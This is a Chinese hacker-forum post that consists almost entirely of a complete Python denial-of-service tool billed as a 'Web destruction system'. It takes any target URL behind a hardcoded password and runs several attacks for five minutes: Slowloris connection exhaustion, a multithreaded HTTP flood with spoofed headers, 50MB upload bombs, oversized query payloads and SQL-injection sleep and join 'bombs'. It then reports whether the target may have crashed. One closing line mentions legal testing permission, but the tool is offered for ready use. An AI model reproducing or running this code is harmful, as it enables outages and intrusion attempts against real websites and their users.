cwb3hm

13749 0
Zephyr 2025-12-7 12:51:08 来自手机 | 显示全部楼层 |阅读模式
#!/usr/bin/env python3
# 帝兵-筷子 | 验证式Web毁灭系统 (cs:cs666)
# 作者: 跨紫大帝
# 特性: 1.运行程序 2.输入目标 3.自动攻击

import os
import sys
import time
import socket
import random
import hashlib
import threading
import requests
import subprocess
from datetime import datetime
from urllib.parse import urlparse
from concurrent.futures import ThreadPoolExecutor, as_completed

# ========== 全局配置 ==========
class Config:
    USERNAME = "cs"
    PASSWORD_HASH = hashlib.sha256(b"cs666").hexdigest()  # 密码加密存储
    MAX_THREADS = 1000
    ATTACK_DURATION = 300  # 5分钟

# ========== 豪华界面 ==========
class Interface:
    @staticmethod
    def clear():
        os.system('clear' if os.name == 'posix' else 'cls')
   
    @staticmethod
    def banner():
        Interface.clear()
        print("\033[91m" + "="*80 + "\033[0m")
        print("\033[91m\033[1m")
        print("    ╔══════════════════════════════════════════════════════╗")
        print("    ║        帝兵-筷子 | 验证式Web毁灭系统 V2.0           ║")
        print("    ║              身份: \033[93mcs\033[91m | 密钥: \033[93m******\033[91m                 ║")
        print("    ╚══════════════════════════════════════════════════════╝")
        print("\033[0m")
        print("\033[93m" + "="*80 + "\033[0m")
        print("\033[92m[+] 系统已就绪 | 内置验证激活 | 等待目标输入...\033[0m")
        print("\033[93m" + "="*80 + "\033[0m\n")
   
    @staticmethod
    def attack_banner(target):
        print("\033[91m" + "="*80 + "\033[0m")
        print(f"\033[91m\033[1m[⚡] 目标锁定: {target}\033[0m")
        print(f"\033[93m[⏰] 开始时间: {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}\033[0m")
        print("\033[91m" + "="*80 + "\033[0m")

# ========== 验证系统 ==========
class AuthSystem:
    @staticmethod
    def authenticate():
        """内置验证系统"""
        print("\033[94m[?] 请输入验证凭据 (内置: cs:cs666)\033[0m")
        
        for attempt in range(3):
            username = input("\033[92m[?] 用户名: \033[0m").strip()
            password = input("\033[92m[?] 密码: \033[0m").strip()
            
            # 验证
            if username == Config.USERNAME and hashlib.sha256(password.encode()).hexdigest() == Config.PASSWORD_HASH:
                print("\033[92m[✓] 验证成功!系统已激活\033[0m")
                time.sleep(1)
                return True
            else:
                print(f"\033[91m[✗] 验证失败 ({2-attempt}次机会剩余)\033[0m")
        
        print("\033[91m[!] 验证失败过多,系统退出\033[0m")
        sys.exit(1)

# ========== 目标输入系统 ==========
class TargetInput:
    @staticmethod
    def get_target():
        """获取目标输入"""
        print("\n\033[94m[?] 请输入目标信息\033[0m")
        
        while True:
            # 输入URL/IP
            target = input("\033[92m[?] 目标URL/IP: \033[0m").strip()
            
            if not target:
                print("\033[91m[!] 目标不能为空\033[0m")
                continue
            
            # 格式化目标
            if not target.startswith(('http://', 'https://')):
                target = 'http://' + target
            
            try:
                # 验证目标可达性
                parsed = urlparse(target)
                if not parsed.netloc:
                    print("\033[91m[!] 无效的目标格式\033[0m")
                    continue
               
                print(f"\033[92m[✓] 目标已设置: {target}\033[0m")
               
                # 确认攻击
                confirm = input("\033[93m[?] 确认开始攻击? (y/N): \033[0m").lower()
                if confirm == 'y':
                    return target
                else:
                    print("\033[93m[!] 操作取消\033[0m")
                    continue
                    
            except Exception as e:
                print(f"\033[91m[!] 目标解析错误: {e}\033[0m")

# ========== 毁灭引擎核心 ==========
class DestroyEngine:
    def __init__(self, target):
        self.target = target
        parsed = urlparse(target)
        self.host = parsed.netloc.split(':')[0]
        self.ip = socket.gethostbyname(self.host) if self.host.replace('.', '').isdigit() else self.host
        self.port = parsed.port or 80
        self.running = True
        self.stats = {
            'connections': 0,
            'requests': 0,
            'errors': 0,
            'start_time': time.time()
        }
   
    # ========== 攻击方法 ==========
   
    def slowloris_attack(self, num_connections=800):
        """慢速连接攻击"""
        print(f"\033[94m[1] 启动Slowloris攻击 ({num_connections}连接)...\033[0m")
        
        sockets = []
        for i in range(num_connections):
            try:
                sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                sock.settimeout(4)
                sock.connect((self.ip, self.port))
               
                # 发送不完整请求
                sock.send(f"GET / HTTP/1.1\r\n".encode())
                sock.send(f"Host: {self.host}\r\n".encode())
                sock.send("User-Agent: Mozilla/5.0\r\n".encode())
                sock.send("Accept: text/html,application/xhtml+xml\r\n".encode())
                # 故意不结束请求
               
                sockets.append(sock)
                self.stats['connections'] += 1
               
                # 保持连接线程
                threading.Thread(target=self._keep_alive, args=(sock,), daemon=True).start()
               
            except:
                self.stats['errors'] += 1
                continue
        
        print(f"\033[92m[✓] Slowloris: {len(sockets)}个连接建立\033[0m")
        return sockets
   
    def _keep_alive(self, sock):
        """保持连接活跃"""
        while self.running:
            try:
                sock.send(f"X-{random.randint(1000,9999)}: {random.randint(1,9999)}\r\n".encode())
                time.sleep(random.uniform(10, 25))
            except:
                break
   
    def http_flood_attack(self, num_threads=300):
        """HTTP洪水攻击"""
        print(f"\033[94m[2] 启动HTTP洪水攻击 ({num_threads}线程)...\033[0m")
        
        user_agents = [
            'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
            'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36',
            'Googlebot/2.1 (+http://www.google.com/bot.html)',
            'curl/7.68.0'
        ]
        
        attack_paths = [
            '/',
            '/wp-admin/admin-ajax.php',
            '/admin/login.php',
            '/api/v1/users',
            '/search?q=' + 'a' * 5000,
            '/data/report'
        ]
        
        def flood_worker():
            while self.running and time.time() - self.stats['start_time'] < Config.ATTACK_DURATION:
                try:
                    path = random.choice(attack_paths)
                    url = f"{self.target.rstrip('/')}{path}"
                    
                    headers = {
                        'User-Agent': random.choice(user_agents),
                        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
                        'Accept-Language': 'en-US,en;q=0.9',
                        'Accept-Encoding': 'gzip, deflate, br',
                        'Connection': 'keep-alive',
                        'Cache-Control': 'no-cache',
                        'X-Forwarded-For': f"{random.randint(1,255)}.{random.randint(1,255)}.{random.randint(1,255)}.{random.randint(1,255)}"
                    }
                    
                    response = requests.get(url, headers=headers, timeout=3, verify=False)
                    self.stats['requests'] += 1
                    
                    if self.stats['requests'] % 100 == 0:
                        print(f"\033[93m[~] 已发送 {self.stats['requests']} 请求\033[0m")
                    
                    time.sleep(random.uniform(0.01, 0.1))
                    
                except:
                    self.stats['errors'] += 1
        
        # 启动所有线程
        threads = []
        for i in range(num_threads):
            t = threading.Thread(target=flood_worker, daemon=True)
            t.start()
            threads.append(t)
        
        print(f"\033[92m[✓] HTTP洪水: {len(threads)}个线程启动\033[0m")
        return threads
   
    def resource_exhaustion_attack(self):
        """资源耗尽攻击"""
        print("\033[94m[3] 启动资源耗尽攻击...\033[0m")
        
        # 大文件上传攻击
        def upload_bomb():
            large_content = 'A' * (50 * 1024 * 1024)  # 50MB
            
            upload_endpoints = [
                '/upload.php',
                '/wp-admin/async-upload.php',
                '/admin/upload',
                '/api/upload'
            ]
            
            for endpoint in upload_endpoints:
                try:
                    url = f"{self.target.rstrip('/')}{endpoint}"
                    files = {'file': ('crash_bomb.txt', large_content, 'text/plain')}
                    
                    for _ in range(3):  # 尝试3次
                        response = requests.post(url, files=files, timeout=30, verify=False)
                        if response.status_code < 500:
                            print(f"\033[92m[✓] 上传攻击成功: {endpoint}\033[0m")
                except:
                    pass
        
        # 复杂查询攻击
        def query_bomb():
            complex_queries = [
                {'q': ' OR '.join(['1=1'] * 1000)},
                {'ids[]': ['1'] * 10000},
                {'data': '[' + ','.join(['{"id":' + str(i) + '}' for i in range(1000)]) + ']'}
            ]
            
            for query in complex_queries:
                try:
                    response = requests.get(self.target, params=query, timeout=10, verify=False)
                    print(f"\033[93m[~] 复杂查询发送成功\033[0m")
                except:
                    pass
        
        # 启动攻击线程
        threading.Thread(target=upload_bomb, daemon=True).start()
        threading.Thread(target=query_bomb, daemon=True).start()
        
        return True
   
    def sql_injection_bomb(self):
        """SQL注入炸弹"""
        print("\033[94m[4] 启动SQL注入炸弹...\033[0m")
        
        sql_bombs = [
            "' AND (SELECT COUNT(*) FROM information_schema.tables A, information_schema.tables B, information_schema.tables C, information_schema.tables D) AND '1'='1",
            "' OR SLEEP(10) OR '1'='1",
            "' OR id IN (" + ",".join(str(i) for i in range(10000)) + ") OR '1'='1"
        ]
        
        for bomb in sql_bombs:
            try:
                test_url = f"{self.target}?id={bomb}" if '?' not in self.target else f"{self.target}&id={bomb}"
                response = requests.get(test_url, timeout=15, verify=False)
               
                if response.status_code == 500 or 'error' in response.text.lower():
                    print(f"\033[92m[✓] SQL炸弹可能生效\033[0m")
                    return True
                    
            except requests.exceptions.Timeout:
                print(f"\033[92m[✓] SQL炸弹导致超时\033[0m")
                return True
            except:
                continue
        
        return False
   
    def execute_full_attack(self):
        """执行完整攻击序列"""
        Interface.attack_banner(self.target)
        
        print("\033[91m\033[1m[⚡] 启动毁灭协议...\033[0m")
        
        # 攻击阶段1: 慢速连接
        slow_sockets = self.slowloris_attack(800)
        
        # 攻击阶段2: HTTP洪水
        flood_threads = self.http_flood_attack(300)
        
        # 攻击阶段3: 资源耗尽
        self.resource_exhaustion_attack()
        
        # 攻击阶段4: SQL炸弹
        sql_result = self.sql_injection_bomb()
        
        # 显示实时统计
        self.show_stats_loop()
        
        # 等待攻击完成
        print(f"\n\033[93m[⏳] 攻击进行中,将持续 {Config.ATTACK_DURATION//60} 分钟...\033[0m")
        
        try:
            time.sleep(Config.ATTACK_DURATION)
        except KeyboardInterrupt:
            print("\n\033[93m[!] 用户中断攻击\033[0m")
        
        # 停止攻击
        self.running = False
        
        # 清理资源
        for sock in slow_sockets:
            try:
                sock.close()
            except:
                pass
        
        # 显示最终结果
        self.show_final_results()
   
    def show_stats_loop(self):
        """显示实时统计"""
        def stats_display():
            while self.running:
                elapsed = time.time() - self.stats['start_time']
                print(f"\r\033[94m[📊] 状态: {int(elapsed)}s | 连接: {self.stats['connections']} | 请求: {self.stats['requests']} | 错误: {self.stats['errors']}\033[0m", end='', flush=True)
                time.sleep(1)
        
        threading.Thread(target=stats_display, daemon=True).start()
   
    def show_final_results(self):
        """显示最终结果"""
        elapsed = time.time() - self.stats['start_time']
        
        print("\n\033[91m" + "="*80 + "\033[0m")
        print("\033[91m\033[1m[🎯] 攻击完成报告\033[0m")
        print("\033[91m" + "="*80 + "\033[0m")
        print(f"\033[93m攻击时长: {int(elapsed)} 秒\033[0m")
        print(f"\033[93m活跃连接: {self.stats['connections']}\033[0m")
        print(f"\033[93mHTTP请求: {self.stats['requests']}\033[0m")
        print(f"\033[93m错误数量: {self.stats['errors']}\033[0m")
        print(f"\033[93m目标状态: {'可能崩溃' if self.stats['errors'] > 1000 else '可能仍在运行'}\033[0m")
        print("\033[91m" + "="*80 + "\033[0m")

# ========== 主程序 ==========
def main():
    """主函数"""
    try:
        # 显示横幅
        Interface.banner()
        
        # 验证系统
        if not AuthSystem.authenticate():
            return
        
        # 获取目标
        target = TargetInput.get_target()
        
        if not target:
            print("\033[93m[!] 未获取有效目标,程序退出\033[0m")
            return
        
        # 创建毁灭引擎
        engine = DestroyEngine(target)
        
        # 执行攻击
        engine.execute_full_attack()
        
        print("\n\033[92m[✓] 帝兵-筷子系统执行完毕\033[0m")
        print("\033[93m[!] 请确保您有合法的测试权限\033[0m")
        
    except KeyboardInterrupt:
        print("\n\033[93m[!] 程序被用户中断\033[0m")
    except Exception as e:
        print(f"\033[91m[!] 程序错误: {e}\033[0m")

# ========== 启动 ==========
if __name__ == "__main__":
    # 检查依赖
    try:
        import requests
    except ImportError:
        print("\033[91m[!] 缺少依赖,请运行: pip install requests\033[0m")
        sys.exit(1)
   
    # 运行主程序
    main()
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Zephyr

特级红客

关注
  • 74
    主题
  • 4
    粉丝
  • 79
    关注
这家伙很懒,什么都没留下!

中国红客联盟公众号

联系站长QQ:5520533

admin@chnhonker.com
Copyright © 2001-2026 Discuz Team. Powered by Discuz! X3.5 ( 粤ICP备13060014号 )|天天打卡 本站已运行